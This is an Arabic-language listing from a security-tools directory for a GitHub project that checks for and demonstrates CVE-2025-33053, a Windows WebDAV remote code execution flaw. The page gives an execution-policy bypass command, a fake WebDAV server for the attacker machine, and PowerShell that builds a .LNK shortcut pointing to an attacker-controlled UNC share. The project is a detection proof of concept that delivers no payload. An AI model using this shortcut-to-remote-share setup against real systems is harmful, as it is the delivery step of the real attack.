Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-33053-Checker-PoC — مدقق CVE-2025-33053 وPoC | Kitploit
أدوات/GitHubGitHub/thetorjancaptain/cve-2025-33053-checker-poc
تحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقالتعلم والتعليم
GitHubthetorjancaptain/cve-2025-33053-checker-poc

CVE-2025-33053-Checker-PoC

مدقق CVE-2025-33053 وPoC

عرض المستودع
12منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مدقق الثغرة الأمنية CVE-2025-33053 وإثبات المفهوم (PoC)

إثبات عمل المدقق إثبات عمل المدقق

إثبات عمل PoC إثبات عمل PoC

مجموعة متكاملة من الأدوات للتحقق من الاستغلال المحتمل للثغرة الأمنية CVE-2025-33053 وإظهاره، وهي ثغرة حرجة تسمح بتنفيذ التعليمات البرمجية عن بُعد (RCE) عبر WebDAV وتؤثر على أنظمة Windows.


📌 حول CVE-2025-33053

تتيح الثغرة CVE-2025-33053 للمهاجمين استغلال ملفات الاختصارات .LNK التي تشير إلى مشاركات WebDAV ضارّة عن بُعد، مما قد يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) على الأنظمة المتأثرة.

شروط الثغرة:

  • يجب أن تكون خدمة WebClient مثبّتة وقيد التشغيل على النظام المستهدف.
  • يجب أن يقوم نظام التشغيل المستهدف بحل مسارات UNC عبر WebDAV عند الوصول إلى هذه المسارات — حتى عبر ملفات .LNK.

🔍 كيف تعمل الثغرة؟

  1. ملف .LNK مُصمَّم خصيصًا أو وصول مباشر إلى مسار UNC — يشير إلى مسار UNC بعيد مثل:
  2. عند الوصول إلى ملف .LNK أو تصفّح مسار UNC يدويًا (مثلًا عبر مستكشف الملفات): - تبدأ خدمة WebClient الاتصال بموقع UNC البعيد عبر WebDAV. - يرسل النظام طلب PROPFIND للاستعلام عن البيانات الوصفية من خادم المهاجم.
  3. عند استلام طلب PROPFIND، يمكن للمهاجم التأكد من أن: - النظام المستهدف يحل مسارات UNC عبر WebDAV. - النظام يحتمل أن يكون عرضة للثغرة CVE-2025-33053.

✅ المدقق الفوري للثغرة (CVE-2025-33053_checker.ps1)

ما الذي يفعله:

الفحصالغرض
🔍 حالة خدمة WebClientيتأكد من أن دعم WebDAV نشط وقيد التشغيل.
🔍 معالجة مسار UNC عبر Test-Pathيختبر ما إذا كان النظام يحل مسارات UNC البعيدة عبر WebDAV (شرط مسبق رئيسي لاستغلال الثغرة).

طريقة التشغيل:

  1. افتح PowerShell كمسؤول.

  2. إذا كان تنفيذ البرامج النصية مقيدًا، شغّل:

root@kitploit:~
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
  1. شغّل المدقق: .\CVE-2025-33053_checker.ps1

⚙️ خادم إثبات المفهوم (PoC) (CVE-2025-33053_PoC.py)

ما الذي يفعله:

  • يُنشئ خادمًا شبيهًا بـ WebDAV مبنيًا على Python على جهاز المهاجم.
  • يلتقط طلبات PROPFIND الواردة عندما يحل نظام الضحية مسار UNC الضار.
  • يعرض في الطرفية أن النظام تواصل معه — مما يثبت إمكانية الاستغلال. ملاحظة: تم اختباره في جهاز افتراضي (VM).

الاستخدام:

  1. على جهاز المهاجم (Kali):
root@kitploit:~
python3 CVE-2025-33053_PoC.py --port 8000
  1. على الجهاز المستهدف:
  • افتح مسار UNC مباشرة في مستكشف الملفات:
root@kitploit:~
\\<Kali-IP>@8000\DavWWWRoot\route.exe
  • أنشئ ملف .LNK يدويًا في Windows أو انتقل ببساطة إلى:
root@kitploit:~
\\<Kali-IP>@8000\DavWWWRoot\route.exe
  • مثال على استخدام PowerShell لإنشاء ملف اختصار:
root@kitploit:~
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
  1. إذا كان النظام المستهدف عرضة للثغرة، سيسجّل خادم PoC ما يلي:
root@kitploit:~
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!

🔍 لماذا يُعد إثبات المفهوم هذا مشروعًا وموثوقًا:

✔️ يستخدم حل مسار UNC حقيقيًا — بدون محاكاة. ✔️ يلتقط طلبات PROPFIND الفعلية التي يطلقها نظام التشغيل — وهو السلوك المحدد المطلوب لاستغلال الثغرة. ✔️ يقدم دليلًا حقيقيًا على مستوى الشبكة على وجود الثغرة، دون تنفيذ حمولات أو إلحاق أي ضرر.


🚧 ملاحظات مهمة

لا يستغل إثبات المفهوم هذا النظام المستهدف أو يضر به — بل يكتشف فقط السلوك الضعيف الكامن وراء الثغرة. مخصص للاستخدام في بيئات خاضعة للتحكم أو بتفويض صريح. يعرض سلوك النظام الحقيقي — وليس محاكاة وهمية. للاستخدام التعليمي فقط. لا تشغّله على أنظمة غير مصرّح لك بها.


🏷️ الترخيص

رخصة MIT — مجانية لأغراض التعليم والبحث والدفاع فقط.


🤝 المساهمة

طلبات السحب (Pull Requests) مرحب بها — حسّن الاكتشاف، أو أضف ميزات، أو اقترح إصلاحات.


⚠️ إخلاء مسؤولية

هذا المستودع لأغراض التعليم والبحث الأمني المصرّح به فقط. يُمنع منعًا باتًا إساءة استخدامه ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها.

تنزيل الأداة